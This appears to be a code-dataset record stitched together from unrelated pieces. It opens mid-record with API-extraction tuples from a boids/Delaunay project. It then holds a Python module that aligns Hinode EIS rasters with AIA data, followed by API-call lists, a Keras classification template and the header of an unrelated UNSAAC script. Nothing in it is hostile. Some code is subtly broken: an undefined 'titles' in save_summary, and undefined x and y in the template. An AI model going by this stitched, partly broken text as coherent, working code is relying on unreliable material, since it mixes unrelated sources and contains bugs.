'(self.positions)\n', (11238, 11254), False, 'from delauney_triangulation.triangulation_core.triangulation import triangulate\n'), ((3269, 3293), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_h', '(2)'], {}), '(offset_h, 2)\n', (3280, 3293), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3335, 3359), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_h', '(2)'], {}), '(offset_h, 2)\n', (3346, 3359), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3390, 3414), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_w', '(2)'], {}), '(offset_w, 2)\n', (3401, 3414), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((3445, 3469), 'delauney_triangulation.triangulation_core.linear_algebra.list_divide', 'list_divide', (['offset_w', '(2)'], {}), '(offset_w, 2)\n', (3456, 3469), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((4141, 4194), 'math.atan2', 'atan2', (['(n_pos[0] - self.pos[0])', '(n_pos[1] - self.pos[1])'], {}), '(n_pos[0] - self.pos[0], n_pos[1] - self.pos[1])\n', (4146, 4194), False, 'from math import atan2, sqrt\n'), ((5139, 5170), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (5143, 5170), False, 'from math import atan2, sqrt\n'), ((9944, 9988), 'boids_core.generate_values.random', 'generate_values.random', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (9966, 9988), True, 'import boids_core.generate_values as generate_values\n'), ((10053, 10098), 'boids_core.generate_values.lattice', 'generate_values.lattice', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (10076, 10098), True, 'import boids_core.generate_values as generate_values\n'), ((10174, 10225), 'boids_core.generate_values.noisy_lattice', 'generate_values.noisy_lattice', (['self.num', 'self.world'], {}), '(self.num, self.world)\n', (10203, 10225), True, 'import boids_core.generate_values as generate_values\n'), ((3498, 3522), 'numpy.asarray', 'np.asarray', (['[p1, p2, p3]'], {}), '([p1, p2, p3])\n', (3508, 3522), True, 'import numpy as np\n'), ((4554, 4585), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (4558, 4585), False, 'from math import atan2, sqrt\n'), ((8465, 8506), 'math.sqrt', 'sqrt', (['(self.vel[0] ** 2 + self.vel[1] ** 2)'], {}), '(self.vel[0] ** 2 + self.vel[1] ** 2)\n', (8469, 8506), False, 'from math import atan2, sqrt\n'), ((8546, 8581), 'delauney_triangulation.triangulation_core.linear_algebra.normalise', 'normalise', (['self.vel', 'self.max_speed'], {}), '(self.vel, self.max_speed)\n', (8555, 8581), False, 'from delauney_triangulation.triangulation_core.linear_algebra import vector_add, vector_sub, list_divide, perpendicular, normalise\n'), ((12473, 12504), 'math.sqrt', 'sqrt', (['(diff_x ** 2 + diff_y ** 2)'], {}), '(diff_x ** 2 + diff_y ** 2)\n', (12477, 12504), False, 'from math import atan2, sqrt\n')]
|
#!/usr/bin/env python3
import datetime
import os
import warnings
import numpy as np
import scipy.interpolate as si
import matplotlib as mpl
from matplotlib.backends import backend_pdf
import matplotlib.pyplot as plt
from .utils import aia_raster
from .utils import cli
from .utils import eis
from .utils import num
from .utils import plots
from . import coregister as cr
class OptPointingVerif(object):
def __init__(self,
verif_dir, eis_name, aia_band,
pointings,
raster_builder, eis_int,
titles, ranges, offsets, cross_correlations,
start_time, stop_time,
):
''' Build and save pointing verification data
Parameters
==========
verif_dir : str
eis_name : str
aia_band : int
pointings : list of eis.EISPointing
raster_builder : aia_raster.SyntheticRasterBuilder
eis_int : 2D array
titles : list of str
ranges : list
Items can be either 3-tuples of cr.tools.OffsetSet, or None.
offsets : list
Items can be either 3-tuples of floats, or arrays of shape (n, 3).
cross_correlations : list of arrays
start_time : datetime.datetime
stop_time : datetime.datetime
'''
self.verif_dir = verif_dir
self.eis_name = eis_name
self.aia_band = aia_band
self.pointings = pointings
self.raster_builder = raster_builder
self.eis_int = eis_int
self.titles = titles
self.ranges = ranges
self.offsets = offsets
self.cross_correlations = cross_correlations
self.start_time = start_time
self.stop_time = stop_time
self.rms = []
if not os.path.exists(self.verif_dir):
os.makedirs(self.verif_dir)
def save_all(self):
self.save_npz()
self.save_figures()
self.save_summary()
def save_npz(self):
''' Save cc, offset, and new coordinates '''
np.savez(
os.path.join(self.verif_dir, 'offsets.npz'),
offset=np.array(self.offsets, dtype=object),
cc=np.array(self.cross_correlations, dtype=object),
x=self.pointings[-1].x, y=self.pointings[-1].y,
)
def save_summary(self):
''' Print and save yaml summary '''
if not self.rms:
self.rms = [None] * (len(titles) + 1)
run_specs = [
('verif_dir', self.verif_dir),
('initial_rms', self.rms[0]),
('steps', self._repr_steps(
self.titles,
self.ranges,
self.offsets,
self.cross_correlations,
self.rms[1:],
indent=2)),
('exec_time', self.stop_time - self.start_time),
]
summary = ''
for spec in run_specs:
summary += self._repr_kv(*spec, indent=0)
print('\n---\n', summary, '...', sep='')
with open(os.path.join(self.verif_dir, 'summary.yml'), 'w') as f:
f.write(summary)
def _repr_offset(self, offset):
offset = list(offset)
offset[0], offset[1] = offset[1], offset[0]
return offset
def _repr_kv(self, name, value, indent=0, sep=': ', end='\n'):
form = '{:#.6g}'
if isinstance(value, (list, tuple)):
value = [form.format(v)
if np.issubdtype(type(v), (float, np.inexact))
else str(v)
for v in value]
value = '[' + ', '.join(value) + ']'
if value is None:
value = 'null'
elif np.issubdtype(type(value), (float, np.inexact)):
value = form.format(value)
else:
value = str(value)
string = ''.join([indent * ' ', name, sep, str(value), end])
return string
def _repr_steps(self, titles, all_ranges, offsets, ccs, rmss, indent=0):
indent += 2
ret = '\n'
for name, ranges, offset, cc, rms in \
zip(titles, all_ranges, offsets, ccs, rmss):
ret += ' '*(indent-2) + '- '
ret += self._repr_kv('name', name, indent=0)
if ranges:
ry, rx, ra = ranges
ret += self._repr_kv('range_x', rx, indent=indent)
ret += self._repr_kv('range_y', ry, indent=indent)
ret += self._repr_kv('range_a', ra, indent=indent)
if len(offset) <= 3:
ret += self._repr_kv('offset', self._repr_offset(offset), indent=indent)
ret += self._repr_kv('cc_max', np.nanmax(cc), indent=indent)
if rms is not None:
ret += self._repr_kv('rms', rms, indent=indent)
if ret[-1] == '\n':
ret = ret[:-1]
return ret
def save_figures(self):
''' plot alignment results '''
diff_norm = mpl.colors.Normalize(vmin=-3, vmax=+3)
n_pointings = len(self.pointings)
for i, pointing in enumerate(self.pointings):
name = 'step_{}'.format(i)
if i == 0:
name += '_original'
elif i == n_pointings - 1:
name += '_optimal'
self.plot_intensity(pointing, name=name, diff_norm=diff_norm)
self.plot_slit_align()
def _get_interpolated_maps(self, pointing, save_to=None):
''' get maps and interpolate them on an evenly-spaced grid '''
x, y = pointing.x, pointing.y
aia_int = self.raster_builder.get_raster(
x, y, pointing.t / 3600,
extrapolate_t=True)
y_interp = np.linspace(y.min(), y.max(), y.shape[0])
x_interp = np.linspace(x.min(), x.max(), x.shape[1])
xi_interp = np.moveaxis(np.array(np.meshgrid(x_interp, y_interp)), 0, -1)
points = (x.flatten(), y.flatten())
eis_int_interp = si.LinearNDInterpolator(points, self.eis_int.flatten())
eis_int_interp = eis_int_interp(xi_interp)
aia_int_interp = si.LinearNDInterpolator(points, aia_int.flatten())
aia_int_interp = aia_int_interp(xi_interp)
if save_to:
np.savez(
save_to,
x=x,
y=y,
eis_int=self.eis_int,
aia_int=aia_int,
x_interp=x_interp,
y_interp=y_interp,
eis_int_interp=eis_int_interp,
aia_int_interp=aia_int_interp,
)
return x_interp, y_interp, eis_int_interp, aia_int_interp
def _normalize_intensity(self, a, b, norm=mpl.colors.Normalize):
def normalize(arr):
arr_stat = arr[~(arr == 0)] # exclude possibly missing AIA data
arr = (arr - np.nanmean(arr_stat)) / np.nanstd(arr_stat)
return arr
a = normalize(a)
b = normalize(b)
offset = - np.nanmin((a, b))
offset += .1
a += offset
b += offset
norm = norm(vmin=np.nanmin((a, b)), vmax=np.nanmax((a, b)))
return a, b, norm
def plot_intensity(self, pointing, name='', diff_norm=None):
''' plot intensity maps of EIS and AIA rasters '''
if name:
name = '_' + name
filenames = {
'npy': 'intensity_data{}.npz',
'intensity': 'intensity_maps{}.pdf',
'diff': 'intensity_diff{}.pdf',
}
filenames = {k: os.path.join(self.verif_dir, v.format(name))
for k, v in filenames.items()}
# build and save normalized intensity maps
x, y, eis_int, aia_int = self._get_interpolated_maps(
pointing, save_to=filenames['npy'])
eis_int, aia_int, norm = self._normalize_intensity(
eis_int, aia_int, mpl.colors.LogNorm)
# plot maps
pp = backend_pdf.PdfPages(filenames['intensity'])
intensity_plots = (
(eis_int, 'EIS'),
(aia_int, 'synthetic raster from AIA {}'.format(self.aia_band)),
)
for int_map, title in intensity_plots:
plt.clf()
plots.plot_map(
plt.gca(),
int_map, coordinates=[x, y],
cmap='gray', norm=norm)
plt.title(title)
plt.xlabel('X [arcsec]')
plt.ylabel('Y [arcsec]')
plt.savefig(pp)
pp.close()
# plot difference
diff = eis_int - aia_int
rms = np.sqrt(np.nanmean(diff**2))
self.rms.append(rms)
if not diff_norm:
vlim = np.nanmax(np.abs(diff))
diff_norm = mpl.colors.Normalize(vmin=-vlim, vmax=+vlim)
plt.clf()
im = plots.plot_map(
plt.gca(),
diff, coordinates=[x, y],
cmap='gray', norm=diff_norm)
cb = plt.colorbar(im)
cb.set_label('normalised EIS − AIA')
plt.title('RMS = {:.2g}'.format(rms))
plt.xlabel('X [arcsec]')
plt.ylabel('Y [arcsec]')
plt.savefig(filenames['diff'])
def _get_slit_offset(self):
slit_offsets = []
for offset in self.offsets:
if np.array(offset).ndim > 1:
slit_offsets.append(offset)
if len(slit_offsets) == 0:
return None
elif len(slit_offsets) > 1:
warnings.warn('Multiple slitshift steps. Plotting the first one')
return slit_offsets[0]
def plot_slit_align(self):
''' plot offsets and slit coordinates '''
slit_offset = self._get_slit_offset()
if slit_offset is None:
return
pp = backend_pdf.PdfPages(os.path.join(self.verif_dir, 'slit_align.pdf'))
x_color = '#2ca02c'
y_color = '#1f77b4'
old_color = '#d62728'
new_color = '#000000'
# offset
plt.clf()
plt.plot(slit_offset.T[1], '.', label='X', color=x_color)
plt.plot(slit_offset.T[0], '.', label='Y', color=y_color)
plt.title(self.eis_name)
plt.xlabel('slit position')
plt.ylabel('offset [arcsec]')
plt.legend()
plt.savefig(pp)
# new coordinates
plots = [
('X', self.pointings[-1].x, self.pointings[0].x),
('Y', self.pointings[-1].y, self.pointings[0].y),
]
for name, aligned, original in plots:
plt.clf()
plt.plot(original[0], ',', label='original ' + name, color=old_color)
plt.plot(aligned[0], ',', label='aligned ' + name, color=new_color)
plt.legend()
plt.title(self.eis_name)
plt.xlabel('slit position')
plt.ylabel(name + ' [arcsec]')
plt.savefig(pp)
pp.close()
def shift_step(x, y, eis_int, aia_int, cores=None, **kwargs):
cli.print_now('> correct translation')
x, y, offset = cr.images.align(
eis_int, x, y,
aia_int, x, y,
cores=cores, **kwargs)
y_offset, x_offset, cc = offset
offset = [y_offset, x_offset, 0]
offset_set = None
title = 'shift'
return title, offset_set, offset, cc, x, y
def rotshift_step(x, y, dates_rel_hours, eis_int, raster_builder,
cores=None, **kwargs):
cli.print_now('> align rasters')
x, y, offset = cr.rasters.align(
eis_int, x, y, dates_rel_hours, raster_builder,
cores=cores, **kwargs)
y_offset, x_offset, a_offset, cc = offset
offset = [y_offset, x_offset, a_offset]
offset_set = (kwargs['y_set'], kwargs['x_set'], kwargs['a_set'])
title = 'rotshift'
return title, offset_set, offset, cc, x, y
def slitshift_step(x, y, dates_rel_hours, eis_int, raster_builder,
cores=None, **kwargs):
cli.print_now('> align slit positions')
x, y, offset = cr.slits.align(
eis_int, x, y, dates_rel_hours, raster_builder,
cores=cores, **kwargs)
offset, cc = offset
offset_set = (kwargs['y_set'], kwargs['x_set'], kwargs['a_set'])
title = 'slitshift'
return title, offset_set, offset, cc, x, y
def optimal_pointing(eis_data, cores=None, aia_band=None,
verif_dir=None, aia_cache=None, eis_name=None, steps_file=None):
''' Determine the EIS pointing using AIA data as a reference.
Parameters
==========
eis_data : eis.EISData
Object containing the EIS intensity and pointing.
cores : int or None
Number of cores to use for multiprocessing, if any.
aia_band : int
The reference AIA channel. Eg. 193.
verif_dir : str
Path to the directory where to save verification plots.
aia_cache : str
Path to the synthetic AIA raster builder cache file.
eis_name : str
Name of the l0 EIS file eg. eis_l0_20140810_010438
steps_file : str
Path to a yaml file containing the registration steps.
Returns
=======
pointing : eis.EISPointing
Optimal EIS pointing.
'''
if steps_file:
registration_steps = cli.load_corr_steps(steps_file)
else:
warnings.warn('No steps file provided, falling back to default.')
registration_steps = {'steps': [
{'type': 'shift',
'cc_function': 'explicit',
'cc_boundary': 'drop',
'sub_px': True,
},
{'type': 'rotshift',
'x_set': cr.tools.OffsetSet((-10.0, 10.0), number=11),
'y_set': cr.tools.OffsetSet((-5.0, 5.0), number=11),
'a_set': cr.tools.OffsetSet((-3.0, 3.0), step=0.2),
},
{'type': 'slitshift',
'x_set': cr.tools.OffsetSet((-20.0, 20.0), number=21),
'y_set': cr.tools.OffsetSet((-20.0, 20.0), number=21),
'a_set': cr.tools.OffsetSet((0.0, 0.0), number=1),
'mp_mode': 'track'
},
]}
cli.print_now('> build relative and absolute date arrays') # ----------------------
dates_rel = num.seconds_to_timedelta(eis_data.pointing.t)
dates_rel_hours = eis_data.pointing.t / 3600
date_ref = eis_data.pointing.t_ref
dates_abs = date_ref + dates_rel
cli.print_now('> get EIS grid info and add margin') # -----------------------------
x, y = eis_data.pointing.x, eis_data.pointing.y
x_margin = (np.max(x) - np.min(x)) / 2
y_margin = (np.max(y) - np.min(y)) / 2
x_margin = np.max(x_margin)
y_margin = np.max(y_margin)
ny, y_slice = cr.tools.create_margin(y, y_margin, 0)
nx, x_slice = cr.tools.create_margin(x, x_margin, 1)
new_shape = 1, ny, nx
new_slice = slice(None), y_slice, x_slice
eis_int = eis_data.data
cli.print_now('> get AIA data') # -------------------------------------------------
single_aia_frame = registration_steps.get('single_aia_frame', False)
if single_aia_frame:
single_aia_frame = num.dt_average(np.min(dates_abs), np.max(dates_abs))
aia_cache = None
raster_builder = aia_raster.SyntheticRasterBuilder(
dates=[np.min(dates_abs), np.max(dates_abs)],
date_ref=date_ref,
channel=aia_band,
file_cache=aia_cache,
single_frame=single_aia_frame,
)
raster_builder.get_data()
# degrade raster_builder resolution to 3 arcsec (see DelZanna+2011)
raster_builder.degrade_resolution(3, cores=cores)
# crop raster_builder cached data to fix multiprocessing
x_min, x_max = x.min(), x.max()
y_min, y_max = y.min(), y.max()
x_cen = (x_min + x_max) / 2
y_cen = (y_min + y_max) / 2
r = np.sqrt((x_max - x_cen)**2 + (y_max - y_cen)**2)
raster_builder.crop_data(x_cen - r, x_cen + r, y_cen - r, y_cen + r)
# compute alignment -------------------------------------------------------
titles = []
offset_sets = []
offsets = []
pointings = [eis_data.pointing]
cross_correlations = []
start_time = datetime.datetime.now()
for step in registration_steps['steps']:
registration_type = step.pop('type')
if registration_type == 'shift':
aia_int = raster_builder.get_raster(
x, y, dates_rel_hours,
extrapolate_t=True)
result = shift_step(x, y, eis_int, aia_int, cores=cores, **step)
elif registration_type == 'rotshift':
result = rotshift_step(x, y, dates_rel_hours,
eis_int, raster_builder,
cores=cores, **step)
elif registration_type == 'slitshift':
result = slitshift_step(x, y, dates_rel_hours,
eis_int, raster_builder,
cores=cores, **step)
else:
raise ValueError('unknown registration step')
title, offset_set, offset, cc, x, y = result
titles.append(title)
offset_sets.append(offset_set)
offsets.append(offset)
pointings.append(eis.EISPointing(x, y, eis_data.pointing.t, date_ref))
cross_correlations.append(cc)
stop_time = datetime.datetime.now()
if verif_dir:
verif = OptPointingVerif(
verif_dir, eis_name, aia_band,
pointings,
raster_builder, eis_int,
titles, offset_sets, offsets, cross_correlations,
start_time, stop_time,
)
verif.save_all()
return pointings[-1]
|
[
"numpy.sqrt",
"matplotlib.pyplot.ylabel",
"numpy.nanmean",
"numpy.array",
"numpy.nanmin",
"os.path.exists",
"numpy.savez",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.nanmax",
"numpy.min",
"warnings.warn",
"numpy.meshgrid",
"numpy.abs",
"numpy.nanstd",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.gca",
"matplotlib.colors.Normalize",
"matplotlib.pyplot.title",
"matplotlib.backends.backend_pdf.PdfPages",
"matplotlib.pyplot.legend",
"os.makedirs",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.colorbar",
"os.path.join",
"datetime.datetime.now"
] |
[((14319, 14335), 'numpy.max', 'np.max', (['x_margin'], {}), '(x_margin)\n', (14325, 14335), True, 'import numpy as np\n'), ((14351, 14367), 'numpy.max', 'np.max', (['y_margin'], {}), '(y_margin)\n', (14357, 14367), True, 'import numpy as np\n'), ((15480, 15532), 'numpy.sqrt', 'np.sqrt', (['((x_max - x_cen) ** 2 + (y_max - y_cen) ** 2)'], {}), '((x_max - x_cen) ** 2 + (y_max - y_cen) ** 2)\n', (15487, 15532), True, 'import numpy as np\n'), ((15819, 15842), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (15840, 15842), False, 'import datetime\n'), ((16900, 16923), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (16921, 16923), False, 'import datetime\n'), ((4917, 4955), 'matplotlib.colors.Normalize', 'mpl.colors.Normalize', ([], {'vmin': '(-3)', 'vmax': '(+3)'}), '(vmin=-3, vmax=+3)\n', (4937, 4955), True, 'import matplotlib as mpl\n'), ((7833, 7877), 'matplotlib.backends.backend_pdf.PdfPages', 'backend_pdf.PdfPages', (["filenames['intensity']"], {}), "(filenames['intensity'])\n", (7853, 7877), False, 'from matplotlib.backends import backend_pdf\n'), ((8664, 8673), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (8671, 8673), True, 'import matplotlib.pyplot as plt\n'), ((8818, 8834), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['im'], {}), '(im)\n', (8830, 8834), True, 'import matplotlib.pyplot as plt\n'), ((8934, 8958), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [arcsec]"""'], {}), "('X [arcsec]')\n", (8944, 8958), True, 'import matplotlib.pyplot as plt\n'), ((8967, 8991), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y [arcsec]"""'], {}), "('Y [arcsec]')\n", (8977, 8991), True, 'import matplotlib.pyplot as plt\n'), ((9000, 9030), 'matplotlib.pyplot.savefig', 'plt.savefig', (["filenames['diff']"], {}), "(filenames['diff'])\n", (9011, 9030), True, 'import matplotlib.pyplot as plt\n'), ((9818, 9827), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9825, 9827), True, 'import matplotlib.pyplot as plt\n'), ((9836, 9893), 'matplotlib.pyplot.plot', 'plt.plot', (['slit_offset.T[1]', '"""."""'], {'label': '"""X"""', 'color': 'x_color'}), "(slit_offset.T[1], '.', label='X', color=x_color)\n", (9844, 9893), True, 'import matplotlib.pyplot as plt\n'), ((9902, 9959), 'matplotlib.pyplot.plot', 'plt.plot', (['slit_offset.T[0]', '"""."""'], {'label': '"""Y"""', 'color': 'y_color'}), "(slit_offset.T[0], '.', label='Y', color=y_color)\n", (9910, 9959), True, 'import matplotlib.pyplot as plt\n'), ((9968, 9992), 'matplotlib.pyplot.title', 'plt.title', (['self.eis_name'], {}), '(self.eis_name)\n', (9977, 9992), True, 'import matplotlib.pyplot as plt\n'), ((10001, 10028), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""slit position"""'], {}), "('slit position')\n", (10011, 10028), True, 'import matplotlib.pyplot as plt\n'), ((10037, 10066), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""offset [arcsec]"""'], {}), "('offset [arcsec]')\n", (10047, 10066), True, 'import matplotlib.pyplot as plt\n'), ((10075, 10087), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10085, 10087), True, 'import matplotlib.pyplot as plt\n'), ((10096, 10111), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (10107, 10111), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13063), 'warnings.warn', 'warnings.warn', (['"""No steps file provided, falling back to default."""'], {}), "('No steps file provided, falling back to default.')\n", (13011, 13063), False, 'import warnings\n'), ((1759, 1789), 'os.path.exists', 'os.path.exists', (['self.verif_dir'], {}), '(self.verif_dir)\n', (1773, 1789), False, 'import os\n'), ((1803, 1830), 'os.makedirs', 'os.makedirs', (['self.verif_dir'], {}), '(self.verif_dir)\n', (1814, 1830), False, 'import os\n'), ((2044, 2087), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""offsets.npz"""'], {}), "(self.verif_dir, 'offsets.npz')\n", (2056, 2087), False, 'import os\n'), ((6165, 6340), 'numpy.savez', 'np.savez', (['save_to'], {'x': 'x', 'y': 'y', 'eis_int': 'self.eis_int', 'aia_int': 'aia_int', 'x_interp': 'x_interp', 'y_interp': 'y_interp', 'eis_int_interp': 'eis_int_interp', 'aia_int_interp': 'aia_int_interp'}), '(save_to, x=x, y=y, eis_int=self.eis_int, aia_int=aia_int, x_interp\n =x_interp, y_interp=y_interp, eis_int_interp=eis_int_interp,\n aia_int_interp=aia_int_interp)\n', (6173, 6340), True, 'import numpy as np\n'), ((6897, 6914), 'numpy.nanmin', 'np.nanmin', (['(a, b)'], {}), '((a, b))\n', (6906, 6914), True, 'import numpy as np\n'), ((8086, 8095), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (8093, 8095), True, 'import matplotlib.pyplot as plt\n'), ((8248, 8264), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (8257, 8264), True, 'import matplotlib.pyplot as plt\n'), ((8277, 8301), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [arcsec]"""'], {}), "('X [arcsec]')\n", (8287, 8301), True, 'import matplotlib.pyplot as plt\n'), ((8314, 8338), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y [arcsec]"""'], {}), "('Y [arcsec]')\n", (8324, 8338), True, 'import matplotlib.pyplot as plt\n'), ((8351, 8366), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (8362, 8366), True, 'import matplotlib.pyplot as plt\n'), ((8468, 8489), 'numpy.nanmean', 'np.nanmean', (['(diff ** 2)'], {}), '(diff ** 2)\n', (8478, 8489), True, 'import numpy as np\n'), ((8611, 8655), 'matplotlib.colors.Normalize', 'mpl.colors.Normalize', ([], {'vmin': '(-vlim)', 'vmax': '(+vlim)'}), '(vmin=-vlim, vmax=+vlim)\n', (8631, 8655), True, 'import matplotlib as mpl\n'), ((8715, 8724), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (8722, 8724), True, 'import matplotlib.pyplot as plt\n'), ((9629, 9675), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""slit_align.pdf"""'], {}), "(self.verif_dir, 'slit_align.pdf')\n", (9641, 9675), False, 'import os\n'), ((10352, 10361), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (10359, 10361), True, 'import matplotlib.pyplot as plt\n'), ((10374, 10443), 'matplotlib.pyplot.plot', 'plt.plot', (['original[0]', '""","""'], {'label': "('original ' + name)", 'color': 'old_color'}), "(original[0], ',', label='original ' + name, color=old_color)\n", (10382, 10443), True, 'import matplotlib.pyplot as plt\n'), ((10456, 10523), 'matplotlib.pyplot.plot', 'plt.plot', (['aligned[0]', '""","""'], {'label': "('aligned ' + name)", 'color': 'new_color'}), "(aligned[0], ',', label='aligned ' + name, color=new_color)\n", (10464, 10523), True, 'import matplotlib.pyplot as plt\n'), ((10538, 10550), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10548, 10550), True, 'import matplotlib.pyplot as plt\n'), ((10563, 10587), 'matplotlib.pyplot.title', 'plt.title', (['self.eis_name'], {}), '(self.eis_name)\n', (10572, 10587), True, 'import matplotlib.pyplot as plt\n'), ((10600, 10627), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""slit position"""'], {}), "('slit position')\n", (10610, 10627), True, 'import matplotlib.pyplot as plt\n'), ((10640, 10670), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (["(name + ' [arcsec]')"], {}), "(name + ' [arcsec]')\n", (10650, 10670), True, 'import matplotlib.pyplot as plt\n'), ((10683, 10698), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (10694, 10698), True, 'import matplotlib.pyplot as plt\n'), ((14234, 14243), 'numpy.max', 'np.max', (['x'], {}), '(x)\n', (14240, 14243), True, 'import numpy as np\n'), ((14246, 14255), 'numpy.min', 'np.min', (['x'], {}), '(x)\n', (14252, 14255), True, 'import numpy as np\n'), ((14277, 14286), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (14283, 14286), True, 'import numpy as np\n'), ((14289, 14298), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14295, 14298), True, 'import numpy as np\n'), ((14812, 14829), 'numpy.min', 'np.min', (['dates_abs'], {}), '(dates_abs)\n', (14818, 14829), True, 'import numpy as np\n'), ((14831, 14848), 'numpy.max', 'np.max', (['dates_abs'], {}), '(dates_abs)\n', (14837, 14848), True, 'import numpy as np\n'), ((2108, 2144), 'numpy.array', 'np.array', (['self.offsets'], {'dtype': 'object'}), '(self.offsets, dtype=object)\n', (2116, 2144), True, 'import numpy as np\n'), ((2161, 2208), 'numpy.array', 'np.array', (['self.cross_correlations'], {'dtype': 'object'}), '(self.cross_correlations, dtype=object)\n', (2169, 2208), True, 'import numpy as np\n'), ((3014, 3057), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""summary.yml"""'], {}), "(self.verif_dir, 'summary.yml')\n", (3026, 3057), False, 'import os\n'), ((5787, 5818), 'numpy.meshgrid', 'np.meshgrid', (['x_interp', 'y_interp'], {}), '(x_interp, y_interp)\n', (5798, 5818), True, 'import numpy as np\n'), ((6785, 6804), 'numpy.nanstd', 'np.nanstd', (['arr_stat'], {}), '(arr_stat)\n', (6794, 6804), True, 'import numpy as np\n'), ((7001, 7018), 'numpy.nanmin', 'np.nanmin', (['(a, b)'], {}), '((a, b))\n', (7010, 7018), True, 'import numpy as np\n'), ((7025, 7042), 'numpy.nanmax', 'np.nanmax', (['(a, b)'], {}), '((a, b))\n', (7034, 7042), True, 'import numpy as np\n'), ((8140, 8149), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (8147, 8149), True, 'import matplotlib.pyplot as plt\n'), ((8573, 8585), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', (8579, 8585), True, 'import numpy as np\n'), ((9319, 9384), 'warnings.warn', 'warnings.warn', (['"""Multiple slitshift steps. Plotting the first one"""'], {}), "('Multiple slitshift steps. Plotting the first one')\n", (9332, 9384), False, 'import warnings\n'), ((14946, 14963), 'numpy.min', 'np.min', (['dates_abs'], {}), '(dates_abs)\n', (14952, 14963), True, 'import numpy as np\n'), ((14965, 14982), 'numpy.max', 'np.max', (['dates_abs'], {}), '(dates_abs)\n', (14971, 14982), True, 'import numpy as np\n'), ((4628, 4641), 'numpy.nanmax', 'np.nanmax', (['cc'], {}), '(cc)\n', (4637, 4641), True, 'import numpy as np\n'), ((6761, 6781), 'numpy.nanmean', 'np.nanmean', (['arr_stat'], {}), '(arr_stat)\n', (6771, 6781), True, 'import numpy as np\n'), ((9141, 9157), 'numpy.array', 'np.array', (['offset'], {}), '(offset)\n', (9149, 9157), True, 'import numpy as np\n')]
|
#A template for when we actually build the model.
import numpy as np
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras import Sequential
categories = [] #List out category string names here
reproducibility = 7 #Constant seed for reproducibility
np.random.seed(reproducibility)
#Load the data here; probably pickle or something like that
train_x,test_x,train_y,test_y = train_test_split(x,y,
test_size=0.2,random_state=reproducibility)
model = Sequential()
#Layers will go here
#Compiled given that we're working with categorization.
model.add(Dense(len(categories),activation="softmax"))
model.compile(optimizer="adam",
loss="categorical_crossentropy",metrics=['accuracy'])
#--
bsize=64
epochs=1000
#--
model.fit(x=train_x,y=train_y, verbose=1,
validation_data=(test_x,test_y),batch_size=bsize,epochs=epochs)
|
[
"sklearn.model_selection.train_test_split",
"tensorflow.keras.Sequential",
"numpy.random.seed"
] |
[((327, 358), 'numpy.random.seed', 'np.random.seed', (['reproducibility'], {}), '(reproducibility)\n', (341, 358), True, 'import numpy as np\n'), ((451, 518), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x', 'y'], {'test_size': '(0.2)', 'random_state': 'reproducibility'}), '(x, y, test_size=0.2, random_state=reproducibility)\n', (467, 518), False, 'from sklearn.model_selection import train_test_split\n'), ((557, 569), 'tensorflow.keras.Sequential', 'Sequential', ([], {}), '()\n', (567, 569), False, 'from tensorflow.keras import Sequential\n')]
|
# -*- coding: utf-8 -*-
"""
============================================================================
Authors:
<NAME> and <NAME>*
*Department of Informatics
Universidad Nacional de San Antonio Abad del Cusco (UNSAAC) - Perú
============================================================================
"""
# Python: 3.8.x
"""
Script for evaluate best topology (static and dinamic) about convergence
"""
import matplotlib.pyplot as plt
